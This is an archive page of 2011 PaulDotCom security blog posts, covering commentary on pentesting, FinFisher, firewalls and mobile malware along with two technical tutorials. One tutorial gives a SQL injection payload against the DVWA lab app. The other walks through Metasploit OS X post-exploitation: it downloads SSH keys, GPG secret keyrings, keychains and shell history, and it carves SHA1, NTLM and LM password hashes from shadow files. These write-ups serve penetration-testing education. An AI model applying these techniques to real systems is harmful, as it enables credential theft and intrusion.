The reason I am jumping on this theme this week is because of the many organizations that hire pen testing companies what the absolute minimum.  Keep the cost and the scope down as much as possible.  However, if you want this done right it is going to cost you in terms of time and money.  Lately, at PaulDotCom we have found a number of our customers have opted to have things done the right way.  Solid recon, slow enumeration and scanning to stay under the detection wire and very targeted attacks.  Why?  Almost all of our current customers that are looking for this type of test have one thing in common…  They have been compromised.  Getting a penetration test is now far more to them than a simple checkbox activity. 



Going forward we are going to focus on three things at PaulDotCom.  First, train your Systems Administrators.  Second, keep an eye on the Pentesting standards group. And finally, start looking into Offensive Countermeasures.  We will have an announcement on the Offensive Countermeasures angle here next week.



Stay tuned.



John Strand



John Strand will be teaching SANS 660 Advanced Network Penetration Testing and Metasploit for Penetration testers This April in Reston, VA April 15 - 23.







        




    

    




    



    

        
FinFisher CoreTrace and Security is Hard

        

    

        By 
John Strand
 on March 14, 2011 11:47 AM

    
    | 
    
        
        
    



    

    


        

            


It is fascinating how we are moving to a greater awareness in the security community that nation-state actors are actively developing and purchasing malware and exploits.  Stuxnet was one of the first internationally recognized state malware specimens and it seems this trend is growing.  



What does this mean to information security?  Well, there are a couple of things that we have to get straight in our heads.  First, traditional detection and prevention technologies are not going to work against this type of threat.  We are talking about groups of people (i.e. nation states) that are putting a significant amount of time and resources into not only creating these programs, but doing robust reconnaissance on the target environments before launching their attacks.  This should drastically change the way you architect your environment to deal with these threats.  You should no longer be just worried about self-propagating worms.  These were an annoyance and they were all the rage a few years ago.  Granted, there is still a risk, but most likely self-propagating worms like Conficker will not bring your business or organization down.  No, we should all be worried about attacks like Aurora, Stuxnet and things like FinFisher.  



How do we best prepare?  First, if you are a vendor and you are sending out emails about how your product "beat down Stuxnet" (we are looking at you CoreTrace) please stop.  Just stop.  



Look, we at PaulDotCom love Application Whitelisting products.  We feel they are a class of product that every company should be looking at to get away from the traditional black list approach.  However, when you say your product can “beat down” malware like Stuxnet and other highly targeted malware, you are not telling the whole story.



insane-clown-posse-006.jpg


That.. and we think you look like these guys.



Why? Well, I cannot help but think that if a nation state was targeting an organization and they were running something like CoreTrace, they would find a way to bypass it.  That is the nature of the threat that many organizations are facing today.  Highly targeted attacks using custom malware to bypass your existing security support structure.  



If the FinFisher incident shows us anything it is revealing how much some nation states and organizations are willing to spend on custom malware.  287,000 euros is not chump change.  By the way, that is about $393,000USD.  






cigars_make_interns_happy.jpg



Or, enough to cover the PDC Cigar/Sock fetish for about a month.



Moving forward we need to start looking at how we can baseline our networks, systems, and applications.  Then we need to start watching for deviations from the norm. There is no shiny box or product that is going to "beat down" all malware and attacks for you.  It is just like health.   We all know what it takes to be healthy.  It requires a good diet and exercise.  But that is hard.  We would much rather buy a pill, which never has worked.  But, it looks easy, so we give it a try anyway.  Maybe, just maybe this time it will work.  It is the same with security.  We know what we have to do: know your network, your systems, your applications, test, test and retest.   Then, when you are done testing, do it some more then hire an organization to do a pentest for you that actually knows what they are doing.  Then, start over again. 



Sure it is hard…  But if it was actually easy we would all be out of a job.



p.s. We have nothing against CoreTrace.  Their product looks solid and whitelisting rocks.  It is just that their marketing department insists on making the company look like tools. 



-Larry  and John Strand



Originally discussed during episode 234



John Strand will be teaching SANS 660 Advanced Network Penetration Testing and Metasploit for Penetration testers This April in Reston, VA April 15 - 23.







        




    

    




    



    

        
PaulDotCom - Cyber Security Weekly - Episode 234 - March 10th 2011

        

    

        By 
Darren Wigley
 on March 13, 2011  8:59 PM

    
    | 
    
        
        
    



    

    


        

            
PaulDotCom Security Weekly from the Mid-Atlantic Collegiate Cyber Defense Competition for 2011.  Where they discuss cyber defense of cyber assets by being a cyber warrior to fight the cyber criminals and the cyber thieves.  Then we have a cyber podcast where we discuss some cyber news about cyber events all over the cyber sphere. So join cyber Paul, cyber Larry, Cyber John, Cyber Carlos, and last and certainly not least Intern Cyber for this cyberific podcast.



cyber.jpeg



Episode 234 Show Notes



Episode 234 Direct Audio Download



All the Pauldotcom Security Weekly episodes on our Bliptv archives.



Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce



Audio Feeds:    

        




    

    




    



    

        
Mid-Atlantic CCDC Competition & Talks Live!

        

    

        By 
Paul Asadoorian
 on March 11, 2011  2:16 PM

    
    | 
    
        
        
    



    

    


        

            
You can tune into our live stream today, Friday March 11, 2011 and Saturday March 12,2011 from 12PM through 9PM EST for information about the hacking competition, ZigBee badge hacking, and several talks:






NOTE: You can also visit PaulDotCom Live! and hang out in our  IRC channel

        




    

    




    



    

        
Manual Blind SQL Injection Part 2: 0wning the DVWA Database with the Help of Burp Repeater

        

    

        By 
John Strand
 on March 11, 2011 12:39 PM

    
    | 
    
        
        
    



    

    


        

            
Hey folks!  Another great post from Dennis Antunes on blind SQL injection!

In our previous post demonstrating Blind SQL Injection vulnerabilities in DVWA, we exploited the fact that user input is dynamically inserted into the SQL query, allowing us to dump and then later crack the password hashes in the dvwa database. Just as easily, we could have gone after all the users in the mysql database as well, including the root user....


1 union select user, password from mysql.user


...properly encoded would have sufficed.

 

Still, one would hope that root would choose a strong password, very difficult to crack.



Sadly, by default, DVWA's default root password is blank, so obviously, no fun there...




So I took it upon myself to change root's password for him/her, to a very difficult (but still not impossible) password to crack.




In the following video, we will again exploit the SQL Injection vulnerabilities in DVWA this time with the help of Burp Repeater/Decoder. Using MySQL's load_file function, we'll browse through the application's source code until we ultimately uncover something very interesting...










Scary easy isn't? In an upcoming post, we'll use root's pilfered credentials to further establish our foothold, increasing our penetration of the application.




Posted by Dennis Antunes



@antunesdennis




Mentoring the SANS Sec 542 in Foxboro, MA beginning 4/13/2011.


Before you register email me at stratmofo at gmail dot com for a special discount code!

        




    

    




    



    

        
PDC at CCDC tonight and recording at 7 PM EST!

        

    

        By 
Mike Perez
 on March 10, 2011  7:30 AM

    
    | 
    
        
        
    



    

    


        

            
Fresh from their CCDC talks Paul and Larry will be recording tonight's Episode 234 live from the Mid-Atlantic CCDC competition!



Please note the time change - 7PM EST.  Also, as a special treat, you can watch a live feed of the rest of the CCDC event tomorrow and Saturday as well.  You can view the live feeds tonight, tomorrow and Saturday by watching the below video:






NOTE: The video will play the most recent show up until we are live!



Each episode comes complete with show notes, detailing the interviews, tech segments, and stories presented.  Please visit our Episode 234 Show Notes Page on the Wiki for more info on the podcast.



For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our  IRC channel, or tune into PaulDotCom Radio for an audio only version of the show.



Assuming the recording gremlins are appeased, click the above links, and enjoy the show live!



- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and  Mike Perez.

        




    

    




    



    

        
Your Firewall is Stupid

        

    

        By 
John Strand
 on March  9, 2011 11:13 AM

    
    | 
    
        
        
    



    

    


        

            
This is a great example of what it’s like to be a firewall admin. Ah, the memories. People seem to think that a firewall is smart. I mean, it’s a "security" device right? So, if it sees something "bad" it will just block it, right? No, firewalls are in fact stupid. They just do what you tell them to do, nothing more, and nothing less. If you tell them to allow everything, they will do just that and open the floodgates. It’s important that you, the human, put some context around each rule and be the intelligence. Firewalls are a tool, kind of like a hammer. Swing it at a window will break the window. Hit the nails the right way and you can build a house.



But still, at its core it is still a tool that is designed to allow traffic through.  I was once talking with Marcus Ranum and he said the firewall was a beautiful thing before everyone shot a hole into it, right through port 80.



black-hat-t.jpg


But..  He promptly set it on fire.. So we're even. Right?



There are a few things that you want to consider when implementing and auditing a firewall.  First, it is possible to have "rules" in it that are not displayed in the ruleset. For example, please check out ioscat and iosmap.  Next, take a look at Implied Rulesets on Checkpoint firewalls. 



The point is: yes, they are dumb, and yes, they do exactly what you tell them to.  



Except when they don’t.



In God we trust…  ‘til he builds a firewall, we'll audit all others.



wirecutters.jpg


God's Firewall!!! On sale now for $2.95 at your lcoal hardware store



-PaulDotCom  and John Strand



Originally discussed during episode 233



John Strand will be teaching SANS 660 Advanced Network Penetration Testing and Metasploit for Penetration testers This April in Reston, VA April 15 - 23.



        




    

    




    



    

        
PaulDotCom - Security Weekly - Episode 233 part 2 - March 3rd 2011

        

    

        By 
Darren Wigley
 on March  8, 2011  8:13 PM

    
    | 
    
        
        
    



    

    


        

            
Ray Davidson takes ShmooCon to college.  Larry continues on with his love for "The Sheen Machine".





Then a better suite of stories for the week are discussed.






Episode 233 Show Notes



Episode 233 part 2 Direct Audio Download



All the Pauldotcom Security Weekly episodes on our Bliptv archives.



Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce



Audio Feeds:    

        




    

    




    



    

        
Smartphone Security, a rant in two acts - Act Two

        

    

        By 
John Strand
 on March  8, 2011  8:18 AM

    
    | 
    
        
        
    



    

    


        

            
A follow-up from last week. Yes, one of the ways to get malware on to a smartphone was the "store," which, last week's article was alluding to, is infallible. Well, the Android marketplace just took down 50 rogue apps that were malicious, all published under fake developer names. That sounds like the alleged infallible method just fails 100 times over. Why 100? 50 fake developers and 50 malicious apps, that weren't caught for some period of time. So how many people downloaded and use them? Well, probably more than the number on one hand, as stated from last week. Looks like these apps were only after cloning your phone, but there is so much more that could happen here.



medium_cellphone-timebomb.jpg


You say this comes with unlimited data?


That seems ligit...



And remember the article we wrote about last week?  Just remember according to the author we have nothing to worry about because it is not that bad yet.  This kind of goes with a theme we are developing for the week.  That is, we are making the same mistakes people.  We need to do a bit more than wait for the security on mobile devices to blow up in our faces before we start to worry about it.  



Get in front of the issues and start figuring how you are going to secure these devices in your enterprise now.  Don’t wait until a 0-day pops all of your mobile devices. 



Brought to you by: haxorthematrix and John Strand



Originally discussed during episode 233



John Strand will be teaching SANS 660 Advanced Network Penetration Testing and Metasploit for Penetration testers This April in Reston, VA April 15 - 23.



Larry will be teaching SANS 617 Wireless Ethical Hacking, Penetration Testing, and Defenses May 9th - 14th in Victoria BC. 

        




    

    




    



    

        
Thunderbolt, now with more hacking

        

    

        By 
John Strand
 on March  7, 2011 11:15 AM

    
    | 
    
        
        
    



    

    


        

            
I really wish Darren was here for this one, but oh well. So, the speculation is now, that with the new Thunderbolt technology on the Macs is apparently connected directly to the PCIe bus. This means that a potential rogue device can be plugged in and would have unauthenticated access to anything else on the PCIe bus - including complete read access to memory and hard drives. Of course this isn't a big deal as most of the Macs already have the same issues with Firewire Express cards and SD ports. Intel does have a solution with VT-d that allows the chipset to be configured so that devices on the PCIe bus don’t have free reign. Unfortunately the chipset in the Mac doesn't support VT-d.



Additionally, ladies and gentlemen, boys and girls of all ages:  Making mistakes is okay.  We know there are tight deadlines that you have to meet.  But please try your absolute best to make new mistakes.  Seriously, did the developers of this technology even look vulnerabilities in Firewire and USB?  It is unacceptable if you look at your connectivity technology and it turns out that Bluetooth is more secure. 



fail_headset_phone[2].jpg


Finally! A secure bluetooth headset!!



So, from the PDC crew to all of the developers who insist on making and remaking the same mistakes as others in the past:


bill-murray-you-suck.jpg



Brought to you by: haxorthematrix and John Strand



Originally discussed during episode 233

        




    

    




    



    

        
PaulDotCom - Security Weekly - Episode 233 part 1 - March 3rd 2011

        

    

        By 
Darren Wigley
 on March  6, 2011  3:49 PM

    
    | 
    
        
        
    



    

    


        

            
Sharon Conheady on the history of social engineering, con-artistry, and the bamboozler.  All this and more on a internless 233 part 1.  I will be back next week and hope it sounds better.






FYI: Sharon has a beautiful voice!



Episode 233 Show Notes



Episode 233 part 1 Direct Audio Download



All the Pauldotcom Security Weekly episodes on our Bliptv archives.



Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce



Audio Feeds:    

        




    

    




    



    

        
iTunes multiple flaws

        

    

        By 
John Strand
 on March  4, 2011  6:44 AM

    
    | 
    
        
        
    



    

    


        

            
Now I probably wouldn't mention this one on normal circumstances, but it seems pretty epic to me. There are a handful of exploits here that can run arbitrary code as the current user. A handful all around a theme if you ask me - loading images and XML. Guess what you might be using to listen to or download this podcast? Yeah, iTunes that has loaded images and XML provided by us. Oh, and MitM attacks against the built-in webkit that can trigger memory errors while browsing the iTunes store. I wonder if it carries over to other webkit enabled browsers….



Further, many people may think this is an unlikely attack surface.  The idea is that you would have to get the attack on the iTunes website.  This is not necessarily true in all situations.  For example, from the Metasploit de-cloak engine you can invoke iTunes.  It could be very possible to leverage these attacks via a XSS attack to launch iTunes and compromise the target system simply because they thought they were going to listening to a new Justin Bieber song. 



Death by Lost Boys.jpg


Thats right...  Death by Stereo!



Also, look very closely at the affected platforms.  It impacts Windows and OS X systems.  Watch this very closely folks.  This is the future.  It is no longer an issue that one OS is more secure than another.  Applications like iTunes, Java and Flash are becoming ubiquitous across all platforms.  On one hand it is nice that we have interoperability, however this reduction to an application level monoculture will have consequences. 



Brought to you by: haxorthematrix and strandjs



Originally discussed during episode 233

        




    

    




    



    

        
Find out what's next on the social engineering agenda tonight!

        

    

        By 
Mike Perez
 on March  3, 2011 12:00 PM

    
    | 
    
        
        
    



    

    


        

            
Come join cosmonaut and world champion belly dancer Sharon Conheady for an overview of social engineering attacks used throughout the ages and then onwards to emerging social engineering techniques and trends.



SC_undercover_sm.jpg


Sharon "Undercover"



PaulDotCom Security Weekly also gets schooled, or rather, goes back to college with an old friend - Ray Davidson!  Ray will go over his recent ShmooCon talk on providing wireless Internet connectivity to conference participants. 



You can view the live feed tonight by watching the below video:






NOTE: The video will play the most recent show up until we are live!



Each episode comes complete with show notes, detailing the interviews, tech segments, and stories presented.  Please visit our Episode 233 Show Notes Page on the Wiki for more info on the podcast.



For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our  IRC channel, or tune into PaulDotCom Radio for an audio only version of the show.



Put on your best running shoes, and enjoy the show live!



- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, and John Strand.

        




    

    




    



    

        
Security is Frustrating

        

    

        By 
John Strand
 on March  2, 2011  9:40 PM

    
    | 
    
        
        
    



    

    


        

            



And this is why we drink. Dave explores the reasons why people do things, like MAC address filtering and hiding their SSID instead of using strong passwords. We see this happen a lot in the corporate world too, people implement security that is easy, not what works. Seems to me that there needs to be a shift of focus. Let’s focus on the hard stuff, like passwords, authentication, physical security, client security, and other stuff that I have probably told people they need to do. Yet, we keep marching down the Firewall/IDS/IPS/Anti-Virus route. Dave brings up two more great points: People think they don't have to defend against the best hacker's in the world, yet the best hackers in the world create tools that people use. Secondly, he questions why we are doing things backwards, as in using simple passwords but implementing hidden SSIDs and MAC filtering.



Further, we see this repeated time and time again when we look at the reality of how humans think.  Need to lose weight? Work out and eat less. Plain, simple and to the point.  But that does not sell.  Want to secure your network?  Baseline your systems, monitor, drill and train.  Then, drill and train again.  Or, you could try to purchase another Bright Shiny Object (BSO, thanks Michelle) and hope, this time, it works.



As for your family.  We need to start training them how to be more responsible.  For adults this can be hard.  However, for younger kids we can start to teach them what things to avoid.






van.jpg



What something to avoid might look like...



For example, don’t post crazy pictures of yourself on Facebook.  Don’t post naked pictures online or keep them on your phone. How about no naked pictures at all?  How about don’t click on links from strangers? 



The reason I bring these things up in relation to the younger generations is because I believe there is hope for them.  The rest of us, that have been here since before the Internet became a "thing," are set in our ways that were formulated when a gig hard-drive was massive.



Sure, this belief in the younger generations may be misplaced.  But I will have faith anyway.



What is the worst that can happen?



fail-imminent-stairs.jpg





-PaulDotCom  and strandjs



Originally on episode 232.

        




    

    




    



    

        
Post Exploitation OS X Style!

        

    

        By 
John Strand
 on March  1, 2011  6:37 AM

    
    | 
    
        
        
    



    

    


        

            
Hello boys and girls!  



Carlos was kind enough to share some of his brand new OS X post exploitation kung-fu during episode 232.  



I know there are a lot of you that still like to believe that OS X does not really matter.  However, it is finally getting a respectable market share of 10.9%.  And, while it may be fun to bash on Apple from time to time, you will stop laughing when you need to exploit an OS X system and pull data from the target machine.  Thankfully, Carlos has made the process of post exploitation far easier for all of us.  For that we all owe him a beer or two.  After all, the only thing Paul has done successfully with a Mac over the past few years from a post-exploitation perspective was pour beer in his Mac. 



So, on to the good stuff.



in today's write-up we will cover 2 new enumeration modules against OS X machines that where added to Metasploit. These  modules are:



- use post/osx/gather/enum_osx  



- use post/osx/gather/hashdump 



We will cover the shell  commands used by the modules themselves. One of the advantages of  post exploitation modules versus the typical Meterpreter script is that they can be written to be used against both shell and Meterpreter. This initial OS X modules are written and tested for shell but many of the tasks are already written to work for Meterpreter once some issues with the Java Meterpreter are fixed. 



Lets start with the OS X Enumeration module. For reasons of demo you will see that we have 2 shell sessions:




 msf exploit(handler) > sessions

 

 Active sessions

 ===============

 

  Id  Type       Information  Connection

  --  ----       -----------  ----------

  1   shell osx               192.168.1.100:4446 -> 192.168.1.100:54010

  2   shell osx               192.168.1.100:4446 -> 192.168.1.100:54013




Session 1 is running as a regular user on a OS X Snow Leopard target and Session 2 is running as root on the same box. The enumeration script will alter its behavior depending on the privilege level it sees it has on the target box and also will alter the commands depending on the version of OSX it is running against. To select the module we use the use command and after selecting we can have a look at the info of the module and the options it provides:




 msf exploit(handler) > use post/osx/gather/enum_osx 
 msf post(enum_osx) > info
 
       Name: Mac OS X Information Enumeration
     Module: post/osx/gather/enum_osx
    Version: 11816
   Platform: OSX
       Arch: 
       Rank: Normal
 
 Provided by:
  Carlos Perez carlos_perez@darkoperator.com
 
 Description:
  This module does initial gathering of information from OSX Tiger, 
  Leopard and Snow Leopard System
 
 
 msf post(enum_osx) > show options
 
 Module options (post/osx/gather/enum_osx):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.



To specify a session to run against we just set the option in the Datastore to the number of the session we want to run against


 msf post(enum_osx) > set SESSION 1
 SESSION => 1




once we have a session selected the only thing we need to do is issue the command run




 msf post(enum_osx) > run

 

 [*] Running module against loki.local

 [*] Saving all data to /Users/cperez/.msf3/logs/post/enum_osx/loki.local_20110224.0303

 [*]     Enumerating Development Tools

 [*]     Enumerating Airport

 [*]     Enumerating Applications

 [*]     Enumerating Ethernet

 [*]     Enumerating Bluetooth

 [*]     Enumerating Logs

 [*]     Enumerating Known Networks

 [*]     Enumerating Firewall

 [*]     Enumerating USB

 [*]     Enumerating OS

 [*]     Enumerating Network

 [*]     Enumerating StartUp

 [*]     Enumerating Printers

 [*]     Enumerating Preference Panes

 [*]     Enumerating Frameworks

 [*]     Enumerating Environment Variables

 [*]     Enumerating UDP Connections

 [*]     Enumerating TCP Connections

 [*]     Enumerating Current Activity

 [*]     Enumerating Process List

 [*]     Enumerating Last Boottime

 [*]     Enumerating Groups

 [*]     Enumerating Users

 [*] .ssh Folder is present

 [*]     Downloading config

 [*]     Downloading id_dsa

 [*]     Downloading id_dsa.pub

 [*]     Downloading known_hosts

 [*] .gnupg Folder is present

 [*]     Downloading gpg.conf

 [*]     Downloading pubring.gpg

 [*]     Downloading pubring.gpg~

 [*]     Downloading random_seed 

 [*]     Downloading secring.gpg

 [*]     Downloading trustdb.gpg

 [*] Capturing screenshot

 [*] Screenshot Captured

 [*] Extracting bash history

 [*]     History file .bash_history found for cperez

 [*]     Downloading .bash_history

 [*]     History file .irb_history found for cperez

 [*]     Downloading .irb_history

 [*]     History file .scapy_history found for cperez

 [*]     Downloading .scapy_history

 [*]     History file .sh_history found for cperez

 [*]     Downloading .sh_history

 [*]     History file .sqlite_history found for cperez

 [*]     Downloading .sqlite_history

 [*] Enumerating and Downloading keychains for cperez

 [*] Post module execution completed

 msf post(enum_osx) > 





As it can be seen the modules gathers a lot of data on the target system starting with configuration, network connection, account information and list of processes, Once it gets all of that info it will check for .ssh and ,gnupg configuration folders and download all configuration files down to the attackers machine. It will do a screen capture followed by the enumeration of any history file found in the users home folder and downloads those. If it is running as root it will extract the SHA1 hashes for the users on the box, if the box is sharing a Samba Share or talks to AD it will also extract the NTLM and LM hashes for the users creating separate files in John the Ripper format for each encryption scheme.



Most of the data collected for configuration is gathered using the system_profiler command, it works by specifying the data type which correspond to a configuration are that we want the information for, to list the supported data types we run the command with -listDataTypes:




 loki:~ cperez$ system_profiler -listDataTypes
 Available Datatypes:
 SPHardwareDataType
 SPNetworkDataType
 SPSoftwareDataType
 SPParallelATADataType
 SPAudioDataType
 SPBluetoothDataType
 SPCardReaderDataType
 SPDiagnosticsDataType
 SPDiscBurningDataType
 SPEthernetDataType
 SPFibreChannelDataType
 SPFireWireDataType
 SPDisplaysDataType
 SPHardwareRAIDDataType
 SPMemoryDataType
 SPPCIDataType
 SPParallelSCSIDataType
 SPPowerDataType
 SPPrintersDataType
 SPSASDataType
 SPSerialATADataType
 SPUSBDataType
 SPAirPortDataType
 SPFirewallDataType
 SPNetworkLocationDataType
 SPModemDataType
 SPNetworkVolumeDataType
 SPWWANDataType
 SPApplicationsDataType
 SPDeveloperToolsDataType
 SPExtensionsDataType
 SPFontsDataType
 SPFrameworksDataType
 SPLogsDataType
 SPManagedClientDataType
 SPPrefPaneDataType
 SPStartupItemDataType
 SPSyncServicesDataType
 SPUniversalAccessDataType




For connection the netstat command is used 




# netstat -np tcp



# netstat -np udp





To get Environment variables we used




# printenv





For Boot Time and current activity the who command




# who -b

# who




For processes

 


# ps -ea




For enumerating users and groups it varies per version of the OS, for Leopard and above:




# dscacheutil -q user

# dscacheutil -q group




For Tiger and bellow:




# lookupd -q user

# lookups -q group




For Screenshot of the following command is used:



 As Root: 




# launchctl bsexec {loginwindow PID} screencapture -x screenshot.jpg 




 As User: 




$ screencapture -x screenshot.jpg 





For history files the following regex is used to match the most common history file names




\.\w*\_history





This will match any hidden file with the word history at the end.



For dumping hashes the module must run as root, OS X does not store the credentials in a passed or master.passwd file but more like HPUX Trusted mode in individual files by account. Firs thing is we need to get the GUID of the account to do this we run



Leopard and Above:




# dscl localhost -read /Search/Users/{user} | grep GeneratedUID | cut -c15-




Tiger:




# niutil -readprop . /users/{user} generateduid





Now with the GUID we can carve the file with the hashes, the modules carves out SHA, LM and NTLM hashes:



• SHA1: 




#/bin/cat /var/db/shadow/hash/{guid}  | cut -c169-216




• NTLM: 




# /bin/cat /var/db/shadow/hash/{guid}  | cut -c1-32




• LM: 




# /bin/cat /var/db/shadow/hash/{guid}  | cut -c33-64




The last thing the module does is enumerate all keychain files for the users and download them:



• As User: 




$ security list-keychains




• As Root: 




# sudo -u {username} -i /usr/bin/security list-keychains





I fully expect there will be more from an OS X exploitation perspective over the next few months and years.  It is comforting to know that Carlos is already ahead of the curve when it comes to post exploitation on this fine platform.



Brought to you by: Darkoperator and strandjs



Originally discussed during episode 231

        




    

    




    




    
    « February 2011 |
    
    Main Index |
    Archives
    
    | April 2011 »